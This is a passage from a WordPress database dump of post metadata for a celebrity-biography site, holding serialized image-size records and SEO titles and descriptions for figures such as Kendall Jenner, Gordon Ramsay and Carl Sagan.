s:10:\"td_324x160\";a:4:{s:4:\"file\";s:26:\"sarah-ferguson-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:26:\"sarah-ferguson-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:26:\"sarah-ferguson-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:26:\"sarah-ferguson-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:26:\"sarah-ferguson-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:26:\"sarah-ferguson-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:26:\"sarah-ferguson-534x400.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:26:\"sarah-ferguson-696x398.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:26:\"sarah-ferguson-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3173,516,'_wp_attachment_image_alt','sarah ferguson'),(3174,381,'_thumbnail_id','516'),(3176,518,'_wp_attached_file','2015/10/bryce-harper-birthday.jpg'),(3177,518,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:400;s:4:\"file\";s:33:\"2015/10/bryce-harper-birthday.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"bryce-harper-birthday-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"bryce-harper-birthday-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:31:\"bryce-harper-birthday-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:32:\"bryce-harper-birthday-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:33:\"bryce-harper-birthday-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:33:\"bryce-harper-birthday-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:33:\"bryce-harper-birthday-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:33:\"bryce-harper-birthday-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:33:\"bryce-harper-birthday-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:33:\"bryce-harper-birthday-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:33:\"bryce-harper-birthday-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:33:\"bryce-harper-birthday-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:33:\"bryce-harper-birthday-534x400.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:33:\"bryce-harper-birthday-696x398.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:33:\"bryce-harper-birthday-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3178,518,'_wp_attachment_image_alt','bryce harper birthday'),(3179,391,'_thumbnail_id','518'),(3182,520,'_wp_attached_file','2015/10/eminems-birthday.jpg'),(3183,520,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:400;s:4:\"file\";s:28:\"2015/10/eminems-birthday.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"eminems-birthday-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"eminems-birthday-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:26:\"eminems-birthday-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:27:\"eminems-birthday-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:28:\"eminems-birthday-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:28:\"eminems-birthday-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:28:\"eminems-birthday-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:28:\"eminems-birthday-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:28:\"eminems-birthday-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:28:\"eminems-birthday-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:28:\"eminems-birthday-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:28:\"eminems-birthday-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:28:\"eminems-birthday-534x400.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:28:\"eminems-birthday-696x398.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:28:\"eminems-birthday-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3184,520,'_wp_attachment_image_alt','eminems birthday'),(3185,411,'_thumbnail_id','520'),(3187,522,'_wp_attached_file','2015/10/freida-pinto-birthday.jpg'),(3188,522,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:400;s:4:\"file\";s:33:\"2015/10/freida-pinto-birthday.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"freida-pinto-birthday-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"freida-pinto-birthday-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:31:\"freida-pinto-birthday-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:32:\"freida-pinto-birthday-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:33:\"freida-pinto-birthday-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:33:\"freida-pinto-birthday-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:33:\"freida-pinto-birthday-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:33:\"freida-pinto-birthday-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:33:\"freida-pinto-birthday-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:33:\"freida-pinto-birthday-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:33:\"freida-pinto-birthday-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:33:\"freida-pinto-birthday-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:33:\"freida-pinto-birthday-534x400.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:33:\"freida-pinto-birthday-696x398.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:33:\"freida-pinto-birthday-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3189,522,'_wp_attachment_image_alt','freida pinto birthday'),(3190,420,'_thumbnail_id','522'),(3192,524,'_edit_lock','1446509629:3'),(3193,524,'_edit_last','3'),(3194,524,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(3195,524,'slide_template','default'),(3196,524,'ct_mb_post_bg_color','#42586a'),(3197,524,'_yoast_wpseo_focuskw','Aishwarya Rai Bachchan'),(3198,524,'_yoast_wpseo_title','Aishwarya Rai Bachchan (1973 – Present)'),(3199,524,'_yoast_wpseo_metadesc','Aishwarya Rai Bachchan is one of the most beautiful women in the world. She\'s a famous actress and model. Learn how she started her career and became famous.'),(3200,524,'_yoast_wpseo_linkdex','74'),(3201,524,'post_views_count','0'),(3202,525,'_edit_lock','1446516704:3'),(3203,525,'_edit_last','3'),(3204,525,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(3205,525,'slide_template','default'),(3206,525,'ct_mb_post_bg_color','#42586a'),(3207,525,'_yoast_wpseo_focuskw','Nelly'),(3208,525,'_yoast_wpseo_title','Nelly (1974 – Present)'),(3209,525,'_yoast_wpseo_metadesc','Nelly is perhaps one of those rappers that appears to have struck gold when it comes to fame. Learn how he became a sensation for a while and faded away over the years.'),(3210,525,'_yoast_wpseo_linkdex','84'),(3211,525,'post_views_count','0'),(3212,526,'_edit_lock','1480374691:8'),(3213,526,'_edit_last','8'),(3214,526,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3215,526,'slide_template','default'),(3216,526,'ct_mb_post_bg_color','#42586a'),(3217,526,'_yoast_wpseo_focuskw','Kendall Jenner'),(3218,526,'_yoast_wpseo_title','Kendall Jenner (1995 – Present)'),(3219,526,'_yoast_wpseo_metadesc','Kendall Jenner is a very accomplished young woman for her age. She\'s been able to start her career as a model at a young age and has continued to do so ever since.'),(3220,526,'_yoast_wpseo_linkdex','81'),(3221,526,'post_views_count','21'),(3222,527,'_edit_lock','1480373791:8'),(3223,527,'_edit_last','8'),(3224,527,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3225,527,'slide_template','default'),(3226,527,'ct_mb_post_bg_color','#42586a'),(3227,527,'_yoast_wpseo_focuskw','Jessa Duggar'),(3228,527,'_yoast_wpseo_title','Jessa Duggar (1992 – Present)'),(3229,527,'_yoast_wpseo_metadesc','Jessa Duggar is expecting her baby very soon. She has been known for being featured in the documentary 17 Kids and Growing. Learn what she\'s been up to.'),(3230,527,'_yoast_wpseo_linkdex','89'),(3231,527,'post_views_count','34'),(3232,528,'_edit_lock','1480373230:8'),(3233,528,'_edit_last','8'),(3234,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3235,528,'slide_template','default'),(3236,528,'ct_mb_post_bg_color','#42586a'),(3237,528,'_yoast_wpseo_focuskw','Kris Jenner'),(3238,528,'_yoast_wpseo_title','Kris Jenner (1955 – Present)'),(3239,528,'_yoast_wpseo_metadesc','Kris Jenner is the “momager” of the Kardashian family. She\'s handled the family franchise and dealt with being a manager for most of her adult life as well also.'),(3240,528,'_yoast_wpseo_linkdex','86'),(3241,528,'post_views_count','31'),(3242,529,'_edit_lock','1480372824:8'),(3243,529,'_edit_last','8'),(3244,529,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3245,529,'slide_template','default'),(3246,529,'ct_mb_post_bg_color','#42586a'),(3247,529,'_yoast_wpseo_focuskw','Lamar Odom'),(3248,529,'_yoast_wpseo_title','Lamar Odom (1979 – Present)'),(3249,529,'_yoast_wpseo_metadesc','Lamar Odom is a talented basketball player who received national attention during high school. He moved quickly up the ranks to start a successful basketball career.'),(3250,529,'_yoast_wpseo_linkdex','86'),(3251,529,'post_views_count','20'),(3252,530,'_edit_lock','1480372438:8'),(3253,530,'_edit_last','8'),(3254,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3255,530,'slide_template','default'),(3256,530,'ct_mb_post_bg_color','#42586a'),(3257,530,'_yoast_wpseo_focuskw','Lorde'),(3258,530,'_yoast_wpseo_title','Lorde (1996 – Present)'),(3259,530,'_yoast_wpseo_metadesc','Lorde has defined herself as a successful songwriter and singer. Despite her age, she\'s already defined herself as a talented singer who continues to push forward.'),(3260,530,'_yoast_wpseo_linkdex','71'),(3261,530,'post_views_count','21'),(3262,531,'_edit_lock','1480372247:8'),(3263,531,'_edit_last','8'),(3264,531,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3265,531,'slide_template','default'),(3266,531,'ct_mb_post_bg_color','#42586a'),(3267,531,'_yoast_wpseo_focuskw','Gordon Ramsay'),(3268,531,'_yoast_wpseo_title','Gordon Ramsay (1966 - Present)'),(3269,531,'_yoast_wpseo_metadesc','Gordon Ramsay is the head chef from Hell\'s Kitchen. He\'s long been hailed as one of the best chefs in the media, and has proven himself as an excellent chef as well. '),(3270,531,'_yoast_wpseo_linkdex','86'),(3271,531,'post_views_count','16'),(3272,532,'_edit_lock','1480371862:8'),(3273,532,'_edit_last','8'),(3274,532,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3275,532,'slide_template','default'),(3276,532,'ct_mb_post_bg_color','#42586a'),(3277,532,'_yoast_wpseo_focuskw','Carl Sagan'),(3278,532,'_yoast_wpseo_title','Carl Sagan (1934 – 1996)'),(3279,532,'_yoast_wpseo_metadesc','Carl Sagan was a brilliant man who started the show Cosmos originally. He had a fascination with astronomy, and theories about extraterrestrial life that are still known today.'),(3280,532,'_yoast_wpseo_linkdex','86'),(3281,532,'post_views_count','19'),(3282,533,'_edit_lock','1480361457:8'),(3283,533,'_edit_last','8'),(3284,533,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3285,533,'slide_template','default'),(3286,533,'ct_mb_post_bg_color','#42586a'),(3287,533,'_yoast_wpseo_focuskw','Tracy Morgan'),(3288,533,'_yoast_wpseo_title','Tracy Morgan (1968 – Present)'),(3289,533,'_yoast_wpseo_metadesc','Tracy Morgan had a rough start in life. His life has not been the easiest, but it helped to fuel his desire to pursue a career in comedy and to continue to do well for himself.'),(3290,533,'_yoast_wpseo_linkdex','81'),(3291,533,'post_views_count','34'),(3292,534,'_edit_lock','1480361242:8'),(3293,534,'_edit_last','8'),(3294,534,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3295,534,'slide_template','default'),(3296,534,'ct_mb_post_bg_color','#42586a'),(3297,534,'_yoast_wpseo_focuskw','Leo DiCaprio'),(3298,534,'_yoast_wpseo_title','Leo DiCaprio (1974 – Present)'),(3299,534,'_yoast_wpseo_metadesc','Leonardo DiCaprio is perhaps one of the most talented actors for his time. He cares about the environment, and has continued to star in hit films throughout his career.'),(3300,534,'_yoast_wpseo_linkdex','69'),(3301,534,'post_views_count','35'),(3302,535,'_edit_lock','1480360823:8'),(3303,535,'_edit_last','3'),(3304,537,'_wp_attached_file','2015/10/Evander-Holyfield.jpg'),(3305,537,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1542;s:4:\"file\";s:29:\"2015/10/Evander-Holyfield.jpg\";s:5:\"sizes\";a:21:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Evander-Holyfield-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Evander-Holyfield-300x226.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"Evander-Holyfield-768x578.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"Evander-Holyfield-1024x771.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:771;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:27:\"Evander-Holyfield-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:28:\"Evander-Holyfield-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:29:\"Evander-Holyfield-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:29:\"Evander-Holyfield-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:29:\"Evander-Holyfield-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:29:\"Evander-Holyfield-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:29:\"Evander-Holyfield-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:29:\"Evander-Holyfield-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:29:\"Evander-Holyfield-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:29:\"Evander-Holyfield-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:29:\"Evander-Holyfield-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:29:\"Evander-Holyfield-696x524.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:524;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:29:\"Evander-Holyfield-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:29:\"Evander-Holyfield-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:30:\"Evander-Holyfield-1068x580.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_1068x0\";a:4:{s:4:\"file\";s:30:\"Evander-Holyfield-1068x804.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:804;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:29:\"Evander-Holyfield-558x420.jpg\";s:5:\"width\";i:558;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3306,537,'_wp_attachment_image_alt','Evander Holyfield birthday'),(3307,421,'_thumbnail_id','537'),(3309,535,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(3310,535,'slide_template','default'),(3311,535,'ct_mb_post_bg_color','#42586a'),(3312,535,'_yoast_wpseo_focuskw','Ryan Gosling'),(3313,535,'_yoast_wpseo_title','Ryan Gosling (1980 – Present)'),(3314,535,'_yoast_wpseo_metadesc','Ryan Gosling is a beloved, handsome actor. He\'s had a humble acting career so far. He\'s promoted good causes, and has an odd array of talents to his name as a person.'),(3315,535,'_yoast_wpseo_linkdex','84'),(3316,535,'post_views_count','2'),(3317,540,'_edit_lock','1480360408:8'),(3318,540,'_edit_last','8'),(3319,540,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3320,540,'slide_template','default'),(3321,540,'ct_mb_post_bg_color','#42586a'),(3322,540,'_yoast_wpseo_focuskw','Whoopi Goldberg'),(3323,540,'_yoast_wpseo_title','Whoopi Goldberg (1955 – Present)'),(3324,540,'_yoast_wpseo_metadesc','Whoopi Goldberg is one of the successful African-American women to ever be in stand-up comedy. She\'s overcome harsh obstacles in life, and has come out on top.'),(3325,540,'_yoast_wpseo_linkdex','80'),(3326,540,'post_views_count','27'),(3327,541,'_wp_attached_file','2015/10/snoop-dogg-birthday.jpg'),(3328,541,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:31:\"2015/10/snoop-dogg-birthday.jpg\";s:5:\"sizes\";a:20:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"snoop-dogg-birthday-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"snoop-dogg-birthday-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"snoop-dogg-birthday-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"snoop-dogg-birthday-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:29:\"snoop-dogg-birthday-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:30:\"snoop-dogg-birthday-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:31:\"snoop-dogg-birthday-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:31:\"snoop-dogg-birthday-265x198.jpg\";s:5:\"width\";i:265;s:6: